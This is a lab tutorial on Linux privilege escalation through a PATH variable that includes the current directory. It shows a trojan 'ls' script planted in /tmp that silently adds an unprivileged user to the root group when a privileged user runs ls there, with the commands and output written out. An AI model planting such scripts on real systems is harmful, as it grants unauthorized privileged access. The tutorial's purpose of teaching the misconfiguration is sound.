Misconfigured PATH Variable

Introduction

The PATH variable in Linux is a set of paths delimited by colons, containing locations where executable binaries are stored. When a user runs a binary that exists in one of these paths listed in the PATH variable, specifying the absolute path is unnecessary.

user@workstation > echo $PATH
usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/snap/bin

In Linux, typing a single dot (.) in the terminal denotes the current directory. Any program or script in the current directory can be executed by prefixing its name with ./ (e.g., ./script_name). Occasionally, users include the current directory (.) in the PATH variable to execute programs or scripts by simply typing their names. However, this practice can be exploited by attackers to run malicious scripts or binaries.

Step-by-Step Guide

Setup

1. Create a user that should not be a sudo group user

user@user-vm:~$ sudo adduser notroot

2. Add . to PATH variable

Privilege user adding . to PATH.

user@user-vm:/tmp$ PATH=.:${PATH}
user@user-vm:/tmp$ echo $PATH
.:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/snap/bin

Vulnerability lies on having . on the PATH variable.

Exploitation

Our aim is to add the normal user notroot as part of root group.

1. Switch or Login as ‘notroot’

notroot@user-vm:~$ 
notroot@user-vm:/tmp$ groups
notroot
notroot@user-vm:/tmp$ id
uid=1004(notroot) gid=1004(notroot) groups=1004(notroot)

Above shows that notroot does not belong to root group.

2. Creation of malicious ls script.

For this instance, we’ll use the ls command - we’ll create a script named ls:

Add a malicious script inside a folder where the privilege user may possibly ran ls (e.g. /tmp/).

notroot@user-vm:~$ touch /tmp/ls && chmod +x /tmp/ls
notroot@user-vm:/tmp$ nano ls

GNU nano 6.2
sudo usermod -aG root notroot && /bin/ls

For above, we’ve added the command to add notroot user as part of root group, then calling the ls command.

3. Result

Once the privilege user run ls command on /tmp it will execute the malicious ls script instead of the command ls.

notroot@user-vm:~$ ls
user@user-vm:/tmp$ ls
ls
snap-private-tmp
systemd-private-fdd3c09502864376bf27fe67c10253cf-bluetooth.service-CCvwoL
VMwareDnD
vmware-root_571-4248287365

It would still output the ls due to the script running the \bin\ls, added to it would be the execution of the malicious command adding notroot to root groups.

Checking the privilege and group of notroot:

notroot@user-vm:/home/user$ groups
notroot root
notroot@user-vm:/home/user$ id
uid=1004(notroot) gid=1004(notroot) groups=1004(notroot),0(root)

Above shows that notroot is added already to root groups upon execution of ls.

Video Demonstration

Reference

https://materials.rangeforce.com/tutorial/2019/12/25/Misconfigured-PATH/